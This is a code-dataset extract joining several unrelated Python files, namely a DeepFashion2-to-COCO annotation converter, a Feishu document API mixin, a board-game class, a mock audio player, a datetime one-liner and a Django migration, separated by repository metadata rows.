'192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
dataset['categories'].append({
'id': 10,
'name': "short_sleeved_dress",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
dataset['categories'].append({
'id': 11,
'name': "long_sleeved_dress",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
dataset['categories'].append({
'id': 12,
'name': "vest_dress",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
dataset['categories'].append({
'id': 13,
'name': "sling_dress",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
# categories2
dataset['categories2'].append({
'id': 1,
'name': "commodity",
'supercategory': "fashion",
})
dataset['categories2'].append({
'id': 2,
'name': "model",
'supercategory': "fashion"
})
dataset['categories2'].append({
'id': 3,
'name': "detail",
'supercategory': "fashion"
})
dataset['categories2'].append({
'id': 4,
'name': "specification",
'supercategory': "fashion"
})
dataset['categories2'].append({
'id': 5,
'name': "unknown",
'supercategory': "fashion"
})
# dataset['categories2'].append({
# 'id': 0,
# 'name': "ignore",
# 'supercategory': "fashion"
# })
top_categories = (1, 2, 3, 4, 5, 6)
down_categories = (7, 8, 9)
whole_categories = (10, 11, 12, 13)
categories2_name = ['commodity', 'model', 'detail', 'specification', 'unknown']
part_name = ['ignore', 'top', 'down', 'whole']
total_landmark_nums = [25, 33, 31, 39, 15, 15, 10, 14, 8, 29, 37, 19, 19]
scale_types = ['unknown', 'small', 'modest', 'large']
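# container for one garment instance: category, viewpoint, scale, bbox and the number of visible landmarks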
class item:
def __init__(self, cat, viewpoint, scale, bbox, num_points):
self.viewpoint = viewpoint
self.bbox = bbox
self.cat = cat
self.num_points = num_points
self.scale = scale
# return True if the bbox comes within `clip` pixels of the image border, i.e. the object is likely truncated
def bbox_is_truncated(bbox, image_size):
clip = 5
if bbox[0] < clip or bbox[1] < clip or image_size[0] - (bbox[0] + bbox[2]) < clip \
or image_size[1] - (bbox[1] + bbox[3]) < clip:
return True
return False
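# fraction of the image area covered by the bbox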
def bbox_area_ratio(bbox, image_size):
return float(bbox[2] * bbox[3]) / float((image_size[0] * image_size[1]))
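# judge whether an instance is usable from its visible-landmark ratio, viewpoint and whether its bbox is truncated at the image border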
def object_judge(landmark_ratio, viewpoint, bbox_truncated):
if viewpoint == 1:
if landmark_ratio > 0.75:
return True
elif landmark_ratio < 0.4:
return False
else:
if bbox_truncated:
return False
else:
return True
elif viewpoint == 2:
if landmark_ratio > 0.75:
return True
elif landmark_ratio < 0.4:
return False
else:
if bbox_truncated:
return False
else:
return True
elif viewpoint == 3:
if landmark_ratio > 0.6:
return True
elif landmark_ratio < 0.3:
return False
else:
if bbox_truncated:
return False
else:
return True
return False
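# map all garment items of one image to an image-level label: category2 (detail/commodity/model), body part and toward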
def deepfashion2noah(items, image_size):
bboxes = []
viewpoints = []
cats = []
num_points = []
landmark_ratios = []
scales = []
for item in items:
bboxes.append(item.bbox)
viewpoints.append(item.viewpoint)
cats.append(item.cat)
num_points.append(item.num_points)
scales.append(item.scale)
landmark_ratios.append(float(item.num_points) / float(total_landmark_nums[item.cat - 1]))
# toward: 1 means front, 2 means back or side
toward = viewpoints[0] - 1
# detail
res = True
#for bbox in bboxes:
# if bbox_is_truncated(bbox, image_size):
# continue
# else:
# res = False
# break
if len(cats) == 1:
for scale, landmark_ratio, bbox in zip(scales, landmark_ratios, bboxes):
bbox_ratio = bbox_area_ratio(bbox, image_size)
#print("landmark ratio {}, bbox ratio {}".format(landmark_ratio, bbox_ratio))
if scale_types[scale] == 'large' and landmark_ratio < 0.68 and bbox_ratio > 0.6:
category2_id = 3
return category2_id, None, toward
#commodity
for viewpoint in viewpoints:
if viewpoint == 1:
category2_id = 1
return category2_id, None, 1
#model
category2_id = 2
# part : 1 means top part, 2 means down part, 3 means the whole model
part = 0
for cat, landmark_ratio, bbox, viewpoint in zip(cats, landmark_ratios, bboxes, viewpoints):
if cat in top_categories and \
object_judge(landmark_ratio, viewpoint, bbox_is_truncated(bbox, image_size)):
part |= 1
elif cat in down_categories and \
object_judge(landmark_ratio, viewpoint, bbox_is_truncated(bbox, image_size)):
part |= 2
elif cat in whole_categories and \
object_judge(landmark_ratio, viewpoint, bbox_is_truncated(bbox, image_size)):
part |= 3
#print("cat {}, landmark_ratio {}, part {}".format(cat, landmark_ratio, part))
return category2_id, part, toward
start_id = 150001
num_images = 41960
root_dir = '/Users/fangcheng.ji/Documents/datasets/deepfashion2/train/'
#root_dir = '/Users/fangcheng.ji/Documents/datasets/deepfashion2/train/'
sub_index = 0 # the index of ground truth instance
sub_index2 = 0 # the index of annotations2 ground truth instance
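# iterate over the image id range, read each per-image annotation json, and emit COCO-style image and annotation records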
for num in range(start_id, start_id + num_images):
json_name = root_dir + 'annos/' + str(num).zfill(6)+'.json'
image_name = root_dir + 'image/' + str(num).zfill(6)+'.jpg'
print("processing {}".format(image_name))
    if num >= 0 and os.path.isfile(image_name):
imag = Image.open(image_name)
width, height = imag.size
items = []
with open(json_name, 'r') as f:
temp = json.loads(f.read())
source = temp['source']
# filter the user data first, only use the shop data in phase 1
if source != 'shop':
continue
pair_id = temp['pair_id']
dataset['images'].append({
'coco_url': '',
'date_captured': '',
'file_name': str(num).zfill(6) + '.jpg',
'flickr_url': '',
'id': num,
'license': 0,
'width': width,
'height': height
})
for i in temp:
                if i == 'source' or i == 'pair_id':
continue
else:
points = np.zeros(294 * 3)
sub_index = sub_index + 1
# bounding box
box = temp[i]['bounding_box']
w = box[2]-box[0]
h = box[3]-box[1]
x_1 = box[0]
y_1 = box[1]
                    bbox = [x_1, y_1, w, h]
# category
cat = temp[i]['category_id']
cat_name = temp[i]['category_name']
# other attribute
style = temp[i]['style']
viewpoint = temp[i]['viewpoint']
scale = temp[i]['scale']
zoom_in = temp[i]['zoom_in']
occlusion = temp[i]['occlusion']
#segmentation and landmarks
seg = temp[i]['segmentation']
landmarks = temp[i]['landmarks']
points_x = landmarks[0::3]
points_y = landmarks[1::3]
points_v = landmarks[2::3]
points_x = np.array(points_x)
points_y = np.array(points_y)
points_v = np.array(points_v)
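                    # copy this item's landmarks into the fixed slice of the 294-point vector reserved for its category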
if cat == 1:
for n in range(0, 25):
points[3 * n] = points_x[n]
points[3 * n + 1] = points_y[n]
points[3 * n + 2] = points_v[n]
                    elif cat == 2:
for n in range(25, 58):
points[3 * n] = points_x[n - 25]
points[3 * n + 1] = points_y[n - 25]
points[3 * n + 2] = points_v[n - 25]
                    elif cat == 3:
for n in range(58, 89):
points[3 * n] = points_x[n - 58]
points[3 * n + 1] = points_y[n - 58]
points[3 * n + 2] = points_v[n - 58]
elif cat == 4:
for n in range(89, 128):
points[3 * n] = points_x[n - 89]
points[3 * n + 1] = points_y[n - 89]
points[3 * n + 2] = points_v[n - 89]
elif cat == 5:
for n in range(128, 143):
points[3 * n] = points_x[n - 128]
points[3 * n + 1] = points_y[n - 128]
points[3 * n + 2] = points_v[n - 128]
elif cat == 6:
for n in range(143, 158):
points[3 * n] = points_x[n - 143]
points[3 * n + 1] = points_y[n - 143]
points[3 * n + 2] = points_v[n - 143]
elif cat == 7:
for n in range(158, 168):
points[3 * n] = points_x[n - 158]
points[3 * n + 1] = points_y[n - 158]
points[3 * n + 2] = points_v[n - 158]
elif cat == 8:
for n in range(168, 182):
points[3 * n] = points_x[n - 168]
points[3 * n + 1] = points_y[n - 168]
points[3 * n + 2] = points_v[n - 168]
elif cat == 9:
for n in range(182, 190):
points[3 * n] = points_x[n - 182]
points[3 * n + 1] = points_y[n - 182]
points[3 * n + 2] = points_v[n - 182]
elif cat == 10:
for n in range(190, 219):
points[3 * n] = points_x[n - 190]
points[3 * n + 1] = points_y[n - 190]
points[3 * n + 2] = points_v[n - 190]
elif cat == 11:
for n in range(219, 256):
points[3 * n] = points_x[n - 219]
points[3 * n + 1] = points_y[n - 219]
points[3 * n + 2] = points_v[n - 219]
elif cat == 12:
for n in range(256, 275):
points[3 * n] = points_x[n - 256]
points[3 * n + 1] = points_y[n - 256]
points[3 * n + 2] = points_v[n - 256]
elif cat == 13:
for n in range(275, 294):
points[3 * n] = points_x[n - 275]
points[3 * n + 1] = points_y[n - 275]
points[3 * n + 2] = points_v[n - 275]
num_points = len(np.where(points_v > 0)[0])
items.append(item(cat, viewpoint, scale, bbox, num_points))
dataset['annotations'].append({
'area': w*h,
'bbox': bbox,
'category_id': cat,
'id': sub_index,
'pair_id': pair_id,
'image_id': num,
'iscrowd': 0,
'style': style,
                        'num_keypoints': num_points,
                        'keypoints': points.tolist()
#'segmentation': seg,
})
# category2_id, part, toward = deepfashion2noah(items, (width, height))
# for test
# if category2_id == 2:
# new_path = image_name.replace('image', categories2_name[category2_id] + '/' + part_name[part])
# else:
# new_path = image_name.replace('image', categories2_name[category2_id])
#
# shutil.move(image_name, new_path)
part = 0
toward = 0
sub_index2 += 1
dataset['annotations2'].append({
'image_id': num,
'id': sub_index2,
'category2_id': random.randint(1, 5),
'part': part if part is not None else 0,
'toward': toward if toward is not None else 0,
'ignore': 1 # 1 means ignore the result
})
json_name = root_dir + 'classification_ignore_19w.json'
with open(json_name, 'w') as f:
json.dump(dataset, f)
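            # Hedged addition, not in the original script: a lightweight progress line so
            # long conversion runs can be eyeballed. It only reads the in-memory `dataset`
            # dict that the loop above keeps appending to.
            print("so far: {} images, {} annotations, {} annotations2".format(
                len(dataset['images']), len(dataset['annotations']), len(dataset['annotations2'])))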
| 3,425 | -10 | 140 |
fe23fff39b7dd739ed6401f91a2cedc997fe08c6 | 1,606 | py | Python | feishu/api_drive_doc.py | crisone/feishu-python-sdk | 36a610926553f0fc5325c87d3955fde5f5d417be | [
"MIT"
] | 44 | 2020-08-11T04:35:53.000Z | 2022-03-09T16:23:55.000Z | feishu/api_drive_doc.py | crisone/feishu-python-sdk | 36a610926553f0fc5325c87d3955fde5f5d417be | [
"MIT"
] | 2 | 2020-10-21T08:07:20.000Z | 2021-09-10T08:42:03.000Z | feishu/api_drive_doc.py | crisone/feishu-python-sdk | 36a610926553f0fc5325c87d3955fde5f5d417be | [
"MIT"
] | 12 | 2020-10-01T07:00:31.000Z | 2022-03-13T14:59:06.000Z | # coding: utf-8
from __future__ import absolute_import, division, print_function, unicode_literals
from typing import TYPE_CHECKING
from feishu.dt_drive import DriveDocFileMeta
from feishu.dt_help import make_datatype
if TYPE_CHECKING:
from feishu.api import OpenLark
| 30.884615 | 89 | 0.684309 | # coding: utf-8
from __future__ import absolute_import, division, print_function, unicode_literals
from typing import TYPE_CHECKING
from feishu.dt_drive import DriveDocFileMeta
from feishu.dt_help import make_datatype
if TYPE_CHECKING:
from feishu.api import OpenLark
class APIDriveDocMixin(object):
def get_drive_doc_content(self, user_access_token, doc_token):
"""获取 doc 文件内容
:type self: OpenLark
:param user_access_token: user_access_token
:type user_access_token: str
:param doc_token: 文件的 token
:type doc_token: str
:return: 文件原始内容
:rtype: str
该接口用于获取文档的纯文本内容,不包含富文本格式信息,主要用于搜索,如导入 es 等。
https://open.feishu.cn/document/ukTMukTMukTM/ukzNzUjL5czM14SO3MTN
"""
url = self._gen_request_url('/open-apis/doc/v2/{}/raw_content'.format(doc_token))
res = self._get(url, auth_token=user_access_token)
return res['data']['content']
def get_drive_doc_meta(self, user_access_token, doc_token):
"""获取 doc 文件元信息
:type self: OpenLark
:param user_access_token: user_access_token
:type user_access_token: str
:param doc_token: 文件的 token
:type doc_token: str
:return: 文件元内容
:rtype: DriveDocFileMeta
该接口用于根据 docToken 获取元数据。
https://open.feishu.cn/document/ukTMukTMukTM/uczN3UjL3czN14yN3cTN
"""
url = self._gen_request_url('/open-apis/doc/v2/meta/{}'.format(doc_token))
res = self._get(url, auth_token=user_access_token)
return make_datatype(DriveDocFileMeta, res['data'])
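
# Hedged usage sketch (not part of the original module). It assumes `lark` is an
# already-configured OpenLark client that mixes in APIDriveDocMixin, and that
# `user_access_token` and `doc_token` were obtained through the normal auth flow:
#
#     raw_text = lark.get_drive_doc_content(user_access_token, doc_token)
#     meta = lark.get_drive_doc_meta(user_access_token, doc_token)
#     print(raw_text[:100], meta)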
| 0 | 1,470 | 23 |
631d0ad57e7f9c8b7dcf51cf4207ed5358680427 | 1,855 | py | Python | GameElements/boardgame.py | glauberdmo/game-project | 835a3b23a3605dc0070615962e636c754cb6c0c5 | [
"Unlicense"
] | null | null | null | GameElements/boardgame.py | glauberdmo/game-project | 835a3b23a3605dc0070615962e636c754cb6c0c5 | [
"Unlicense"
] | null | null | null | GameElements/boardgame.py | glauberdmo/game-project | 835a3b23a3605dc0070615962e636c754cb6c0c5 | [
"Unlicense"
] | null | null | null | from typing import List
import numpy as np
EMPTY_SYMBOL = "_"
#Validators
| 28.106061 | 71 | 0.563342 | from typing import List
import numpy as np
EMPTY_SYMBOL = "_"
class Boardgame:
    """2D board backed by a numpy array of single-character symbols, plus the units placed on it."""
def __init__(self, board_h:int, board_w:int):
#boardgame is a 2d numpy array
self.board_h = board_h
self.board_w = board_w
self.board = np.zeros((board_h, board_w), dtype=str)
self.board.fill(EMPTY_SYMBOL)
        self.units_in_play: List[object] = []  # units currently placed on the board
    def __setitem__(self, points: tuple, value):
        x, y = points
        self.board[x, y] = value
    def __getitem__(self, points: tuple):
        x, y = points
        return self.board[x, y]
def print_board(self):
print(self.board)
print("\n")
def get_unit_by_xy(self, x:int, y:int) -> object:
for unit in self.units_in_play:
try:
if unit.x == x and unit.y == y:
return unit
except AttributeError:
pass
return None
def add_unit(self, new_unit:object):
self.units_in_play.append(new_unit)
self.board[new_unit.y, new_unit.x] = new_unit.symbol
def remove_unit(self, unit_to_remove:object):
self.board[unit_to_remove.y, unit_to_remove.x] = EMPTY_SYMBOL
self.units_in_play.remove(unit_to_remove)
#Validators
def xy_is_empty(self, x:int, y:int) -> bool:
#returns true if the xy is empty
if self.board[y, x] == EMPTY_SYMBOL:
return True
else:
print("move failed: there is a unit in this position")
return False
def xy_is_valid(self, x:int, y:int) -> bool:
#returns true if xy is inside the board
if x < self.board_w and x >= 0 and y < self.board_h and y >= 0:
return True
else:
print("move failed: xy is not inside the board")
return False
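
if __name__ == "__main__":
    # Hedged demo, not part of the original module: a throwaway unit type with the
    # x/y/symbol attributes the board expects, used for a quick smoke test.
    class _DemoUnit:
        def __init__(self, x: int, y: int, symbol: str):
            self.x = x
            self.y = y
            self.symbol = symbol

    game = Boardgame(3, 4)            # 3 rows, 4 columns
    game.add_unit(_DemoUnit(x=1, y=2, symbol="K"))
    game.print_board()                # "K" appears at row 2, column 1
    print(game.xy_is_valid(5, 0))     # False: x=5 falls outside the 4-wide board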
| 1,457 | -5 | 296 |
21eab977b3a2d85635e8b4aca52f5e2b2a884b9e | 56 | py | Python | 04/01/instance_method/timetz.py | pylangstudy/201709 | 53d868786d7327a83bfa7f4149549c6f9855a6c6 | [
"CC0-1.0"
] | null | null | null | 04/01/instance_method/timetz.py | pylangstudy/201709 | 53d868786d7327a83bfa7f4149549c6f9855a6c6 | [
"CC0-1.0"
] | 32 | 2017-09-01T00:52:17.000Z | 2017-10-01T00:30:02.000Z | 04/01/instance_method/timetz.py | pylangstudy/201709 | 53d868786d7327a83bfa7f4149549c6f9855a6c6 | [
"CC0-1.0"
] | null | null | null | import datetime
print(datetime.datetime.now().timetz())
| 18.666667 | 39 | 0.785714 | import datetime
print(datetime.datetime.now().timetz())
| 0 | 0 | 0 |
2faf25ff3604020d474509c409ccb362674d5d4d | 753 | py | Python | audiotype/MockAudioType.py | monsdar/Mubox | e06e73903b1b7fdd8da48b6189b238ee25a57242 | [
"MIT"
] | null | null | null | audiotype/MockAudioType.py | monsdar/Mubox | e06e73903b1b7fdd8da48b6189b238ee25a57242 | [
"MIT"
] | null | null | null | audiotype/MockAudioType.py | monsdar/Mubox | e06e73903b1b7fdd8da48b6189b238ee25a57242 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
'''
This AudioType only prints some info onto the console
'''
import logging
from audiotype.IAudioType import IAudioType | 30.12 | 83 | 0.658699 | #!/usr/bin/env python3
'''
This AudioType only prints some info onto the console
'''
import logging
from audiotype.IAudioType import IAudioType
class MockAudioType(IAudioType):
def __init__(self):
self.currentTag = ""
self.currentConfig = None
self.logger = logging.getLogger("mubox.MockAudioType")
    def IsResponsible(self, typeIdentifier): # this type can handle any type string
return True
def PlayTag(self, tag, configuration):
self.currentTag = tag
self.currentConfig = configuration
self.logger.info("Playing tag '" + tag + "' with config: " + configuration)
def StopTag(self):
self.logger.info("Stopping to play tag '" + self.currentTag + "'") | 447 | 11 | 150 |
0eba93c3d67b55a38cc6f97c9b04103a070a3ad1 | 498 | py | Python | backend/apps/banking/migrations/0005_auto_20200606_1325.py | anilvrathod1/bestCDK | c940f27da8e0bcafb901f1f10adfb42308f49543 | [
"MIT"
] | 1 | 2020-07-06T12:34:50.000Z | 2020-07-06T12:34:50.000Z | backend/apps/banking/migrations/0005_auto_20200606_1325.py | anilvrathod1/bestCDK | c940f27da8e0bcafb901f1f10adfb42308f49543 | [
"MIT"
] | null | null | null | backend/apps/banking/migrations/0005_auto_20200606_1325.py | anilvrathod1/bestCDK | c940f27da8e0bcafb901f1f10adfb42308f49543 | [
"MIT"
] | null | null | null | # Generated by Django 3.0.6 on 2020-06-06 13:25
import backend.storage_backends
from django.db import migrations, models
| 24.9 | 110 | 0.668675 | # Generated by Django 3.0.6 on 2020-06-06 13:25
import backend.storage_backends
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('banking', '0004_transaction_source_file'),
]
operations = [
migrations.AlterField(
model_name='statementfile',
name='statement_file',
field=models.FileField(storage=backend.storage_backends.PrivateMediaStorage, upload_to='banking'),
),
]
| 0 | 352 | 23 |